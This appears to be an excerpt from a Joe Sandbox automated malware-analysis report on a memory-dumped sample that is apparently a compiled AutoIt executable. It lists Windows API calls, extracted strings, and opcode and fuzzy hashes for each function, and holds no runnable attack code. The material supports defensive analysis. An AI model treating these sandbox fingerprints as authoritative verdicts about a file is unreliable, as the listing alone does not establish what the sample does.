                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                          • String ID: @$ThumbnailClass
                                                                                                                                                          • API String ID: 1788623398-1539354611
                                                                                                                                                          • Opcode ID: cd6f5224e53d6454a25dbe33534c2bb3c5eac9ca3415958a10dbd19c11fea221
                                                                                                                                                          • Instruction ID: 8d9bbf490db928c8fbfb2efc207bb36deeb89c77749f6fdf19578f58248c1344
                                                                                                                                                          • Opcode Fuzzy Hash: cd6f5224e53d6454a25dbe33534c2bb3c5eac9ca3415958a10dbd19c11fea221
                                                                                                                                                          • Instruction Fuzzy Hash: AB81A171408305DBDB09CF10D881FAA7BE8FF54355F04846AFDAA9A091DB34DE49CBA1
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __wcsnicmp
                                                                                                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                          • API String ID: 1038674560-1810252412
                                                                                                                                                          • Opcode ID: 389832f306d34b4f12a3a30aae80a9c38f2ad472a035ec1ecf26d24c17fe045c
                                                                                                                                                          • Instruction ID: a768f0548fda4b6d4e4b3a36ed1eefa41b255965dc737950fec7462e41a83c01
                                                                                                                                                          • Opcode Fuzzy Hash: 389832f306d34b4f12a3a30aae80a9c38f2ad472a035ec1ecf26d24c17fe045c
                                                                                                                                                          • Instruction Fuzzy Hash: 8131CD35A54215E6CB28EB50ED53EAE73A4AF31745F200026F871751E5FF616F18C621
                                                                                                                                                          APIs
                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 0015F8AB
                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0015F8BD
                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0015F8D4
                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0015F8E9
                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0015F8EF
                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0015F8FF
                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0015F905
                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0015F926
                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0015F940
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0015F949
                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0015F9B4
                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0015F9BA
                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0015F9C1
                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0015FA0D
                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0015FA1A
                                                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0015FA3F
                                                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0015FA6A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                           • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3869813825-0
                                                                                                                                                          • Opcode ID: 924299be749b354a5e3628b781e27d2679000afb718a4c27358c8dac347e1c28
                                                                                                                                                          • Instruction ID: 9e698c6e12001612f81597517e1091d7bb28daae11160d6ceb2462e1fcbfa372
                                                                                                                                                          • Opcode Fuzzy Hash: 924299be749b354a5e3628b781e27d2679000afb718a4c27358c8dac347e1c28
                                                                                                                                                          • Instruction Fuzzy Hash: CE513070900B09EFDB209FA4DD89FAEBBB5FF04705F00452CF596A69A0D774A949CB10
                                                                                                                                                          APIs
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0017026A
                                                                                                                                                          • _wcschr.LIBCMT ref: 00170278
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0017028F
                                                                                                                                                          • _wcscat.LIBCMT ref: 0017029E
                                                                                                                                                          • _wcscat.LIBCMT ref: 001702BC
                                                                                                                                                          • _wcscpy.LIBCMT ref: 001702DD
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 001703BA
                                                                                                                                                          • _wcscpy.LIBCMT ref: 001703DF
                                                                                                                                                          • _wcscpy.LIBCMT ref: 001703F1
                                                                                                                                                          • _wcscpy.LIBCMT ref: 00170406
                                                                                                                                                          • _wcscat.LIBCMT ref: 0017041B
                                                                                                                                                          • _wcscat.LIBCMT ref: 0017042D
                                                                                                                                                          • _wcscat.LIBCMT ref: 00170442
                                                                                                                                                            • Part of subcall function 0016C890: _wcscmp.LIBCMT ref: 0016C92A
                                                                                                                                                            • Part of subcall function 0016C890: __wsplitpath.LIBCMT ref: 0016C96F
                                                                                                                                                            • Part of subcall function 0016C890: _wcscpy.LIBCMT ref: 0016C982
                                                                                                                                                            • Part of subcall function 0016C890: _wcscat.LIBCMT ref: 0016C995
                                                                                                                                                            • Part of subcall function 0016C890: __wsplitpath.LIBCMT ref: 0016C9BA
                                                                                                                                                            • Part of subcall function 0016C890: _wcscat.LIBCMT ref: 0016C9D0
                                                                                                                                                            • Part of subcall function 0016C890: _wcscat.LIBCMT ref: 0016C9E3
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                          • API String ID: 2955681530-2806939583
                                                                                                                                                          • Opcode ID: 53cd2705269e71583e8ee006d0e9a3e3744f949a1cca1edeca40a0b27bb41285
                                                                                                                                                          • Instruction ID: 5d198f1357c0ed783dd952f35ed570ac10757f6c9b85562d923776b8f126b4d8
                                                                                                                                                          • Opcode Fuzzy Hash: 53cd2705269e71583e8ee006d0e9a3e3744f949a1cca1edeca40a0b27bb41285
                                                                                                                                                          • Instruction Fuzzy Hash: EE91B271504701EFCB21EF50D955F9BB3E8AF98314F00885DF5499B2A2EB34EA54CB52
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 0018CD0B
                                                                                                                                                          • DestroyWindow.USER32(00000000,?), ref: 0018CD83
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0018CE04
                                                                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0018CE26
                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0018CE35
                                                                                                                                                          • DestroyWindow.USER32(?), ref: 0018CE52
                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00120000,00000000), ref: 0018CE85
                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0018CEA4
                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0018CEB9
                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0018CEC0
                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0018CED2
                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0018CEEA
                                                                                                                                                            • Part of subcall function 0013B155: GetWindowLongW.USER32(?,000000EB), ref: 0013B166
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                          • String ID: 0$tooltips_class32
                                                                                                                                                          • API String ID: 1297703922-3619404913
                                                                                                                                                          • Opcode ID: 6e07ce3d872c7e501eae91379402752d7bb990381d45e16223d47fdeb9ccf955
                                                                                                                                                          • Instruction ID: 5da526cc4142f16cfb9ed267371b9aad16ebcdb478bac5af40f9afc6a55771c5
                                                                                                                                                          • Opcode Fuzzy Hash: 6e07ce3d872c7e501eae91379402752d7bb990381d45e16223d47fdeb9ccf955
                                                                                                                                                          • Instruction Fuzzy Hash: 2771FD71140349AFD724DF28DC84FAA7BE5FB89704F44091CF9869B6A1DB30EA41CB61
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0016B46D
                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0016B476
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0016B482
                                                                                                                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0016B561
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016B591
                                                                                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 0016B5BD
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0016B63F
                                                                                                                                                          • SysFreeString.OLEAUT32(00000016), ref: 0016B6D1
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0016B727
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0016B736
                                                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0016B772
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                          • API String ID: 3730832054-3931177956
                                                                                                                                                          • Opcode ID: 61c50ab371a99a28c80851c151efccdca5b3633f10771a8942794a737e944b32
                                                                                                                                                          • Instruction ID: 59e54e9c9a9b1c6e4380307ae644f952331851ef9445072383eb2a876dff81c7
                                                                                                                                                          • Opcode Fuzzy Hash: 61c50ab371a99a28c80851c151efccdca5b3633f10771a8942794a737e944b32
                                                                                                                                                          • Instruction Fuzzy Hash: 67C1EE71A08615EBCB24EF65DCC4B69B7B4BF09300F158465E40ADB992DB74ECE0DBA0
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00186FF9
                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00187044
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                          • API String ID: 3974292440-4258414348
                                                                                                                                                          APIs
                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0018E3BB
                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0018BCBF), ref: 0018E417
                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E457
                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E49C
                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E4D3
                                                                                                                                                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0018BCBF), ref: 0018E4DF
                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0018E4EF
                                                                                                                                                          • DestroyCursor.USER32(?), ref: 0018E4FE
                                                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0018E51B
                                                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0018E527
                                                                                                                                                            • Part of subcall function 00141BC7: __wcsicmp_l.LIBCMT ref: 00141C50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                          • API String ID: 3907162815-1154884017
                                                                                                                                                          APIs
                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00170EFF
                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00170F0F
                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00170F1B
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00170F79
                                                                                                                                                          • _wcscat.LIBCMT ref: 00170F91
                                                                                                                                                          • _wcscat.LIBCMT ref: 00170FA3
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00170FB8
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00170FCC
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00170FFE
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0017101F
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0017102B
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0017106A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                          • String ID: *.*
                                                                                                                                                          • API String ID: 3566783562-438819550
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 0016DB26
                                                                                                                                                          • GetDriveTypeW.KERNEL32 ref: 0016DB73
                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016DBBB
                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016DBF2
                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016DC20
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                          • API String ID: 2698844021-4113822522
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00194085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00163145
                                                                                                                                                          • LoadStringW.USER32(00000000,?,00194085,00000016), ref: 0016314E
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00194085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00163170
                                                                                                                                                          • LoadStringW.USER32(00000000,?,00194085,00000016), ref: 00163173
                                                                                                                                                          • __swprintf.LIBCMT ref: 001631B3
                                                                                                                                                          • __swprintf.LIBCMT ref: 001631C5
                                                                                                                                                          • _wprintf.LIBCMT ref: 0016326C
                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00163283
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                          • API String ID: 984253442-2268648507
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015B903
                                                                                                                                                            • Part of subcall function 0015B8E7: GetLastError.KERNEL32(?,0015B3CB,?,?,?), ref: 0015B90D
                                                                                                                                                            • Part of subcall function 0015B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0015B3CB,?,?,?), ref: 0015B91C
                                                                                                                                                            • Part of subcall function 0015B8E7: RtlAllocateHeap.NTDLL(00000000,?,0015B3CB), ref: 0015B923
                                                                                                                                                            • Part of subcall function 0015B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015B93A
                                                                                                                                                            • Part of subcall function 0015B982: GetProcessHeap.KERNEL32(00000008,0015B3E1,00000000,00000000,?,0015B3E1,?), ref: 0015B98E
                                                                                                                                                            • Part of subcall function 0015B982: RtlAllocateHeap.NTDLL(00000000,?,0015B3E1), ref: 0015B995
                                                                                                                                                            • Part of subcall function 0015B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0015B3E1,?), ref: 0015B9A6
                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0015B5F7
                                                                                                                                                          • _memset.LIBCMT ref: 0015B60C
                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0015B62B
                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0015B63C
                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0015B679
                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0015B695
                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0015B6B2
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0015B6C1
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0015B6C8
                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0015B6E9
                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 0015B6F0
                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0015B721
                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0015B747
                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0015B75B
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2347767575-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetDC.USER32(00000000), ref: 0017A2DD
                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0017A2E9
                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 0017A2F5
                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0017A302
                                                                                                                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0017A356
                                                                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0017A392
                                                                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0017A3B6
                                                                                                                                                          • SelectObject.GDI32(00000006,?), ref: 0017A3BE
                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0017A3C7
                                                                                                                                                          • DeleteDC.GDI32(00000006), ref: 0017A3CE
                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 0017A3D9
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                          • String ID: (
                                                                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0018BD04,?,?,00000000,?), ref: 0018E57B
                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0018BD04,?,?,00000000,?), ref: 0018E586
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0018BD04,?,?,00000000,?), ref: 0018E593
                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0018E59C
                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0018BD04,?,?,00000000,?), ref: 0018E5AB
                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0018E5B4
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0018BD04,?,?,00000000,?), ref: 0018E5BB
                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0018E5CC
                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,001AD9BC,?), ref: 0018E5E5
                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0018E5F5
                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0018E619
                                                                                                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0018E644
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0018E66C
                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0018E682
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Global$CloseFileHandleObject$AllocCopyCreateDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1759995340-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0016D96C
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016D98E
                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0016D9CB
                                                                                                                                                          • _memset.LIBCMT ref: 0016DA0F
                                                                                                                                                          • _wcsncpy.LIBCMT ref: 0016DA4B
                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0016DA80
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0016DA8B
                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 0016DA94
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0016DA9E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseDirectoryHandle$ControlCreateDeviceFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                          • String ID: :$\$\??\%s
                                                                                                                                                          • API String ID: 1122224643-3457252023
                                                                                                                                                          • Opcode ID: a73a0b4ec1330b19479930eddb53626963d215736faae6241ba16c5a4aaf214b
                                                                                                                                                          • Instruction ID: 3d14d1a92825e4f1c46c82d048997ee085aa8ca7e9db2fe8ad917ee18158ffb0
                                                                                                                                                          • Opcode Fuzzy Hash: a73a0b4ec1330b19479930eddb53626963d215736faae6241ba16c5a4aaf214b
                                                                                                                                                          • Instruction Fuzzy Hash: FD31A976A00208ABDB20DFA4EC49FDA77BDFF89710F1481A6F515D6060E770DA91CBA1
                                                                                                                                                          APIs
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00170C93
                                                                                                                                                          • _wcscat.LIBCMT ref: 00170CAB
                                                                                                                                                          • _wcscat.LIBCMT ref: 00170CBD
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00170CD2
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00170CE6
                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00170CFE
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00170D2A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectory$_wcscat$AttributesFile__wsplitpath
                                                                                                                                                          • String ID: *.*
                                                                                                                                                          • API String ID: 4196653570-438819550
                                                                                                                                                          • Opcode ID: 321954e6fe9fe892c28391710f213672006bc162e68fb5b34b2becd85f7d2b9f
                                                                                                                                                          • Instruction ID: 5dfbc792d3cc599387adb8cec45f67f1fd5d982eeff5fb316687c88fc17cc749
                                                                                                                                                          • Opcode Fuzzy Hash: 321954e6fe9fe892c28391710f213672006bc162e68fb5b34b2becd85f7d2b9f
                                                                                                                                                          • Instruction Fuzzy Hash: 128182B1504305DFC726DF64C844AAAB7F8AB9D314F14C96AF889C7251E730EE85CB92
                                                                                                                                                          APIs
                                                                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 0016D567
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 0016D589
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016D5DC
                                                                                                                                                          • _wprintf.LIBCMT ref: 0016D68D
                                                                                                                                                          • _wprintf.LIBCMT ref: 0016D6AB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                          • API String ID: 2116804098-2391861430
                                                                                                                                                          • Opcode ID: 8be082e5b21348aae9b3e2855b39d50efeac1a64b6720382144736e95f40f61b
                                                                                                                                                          • Instruction ID: 57062e9bbddbf3e789efef82eea4ea5eb5ddceae5c9ddff7a346f05c32a7b6ab
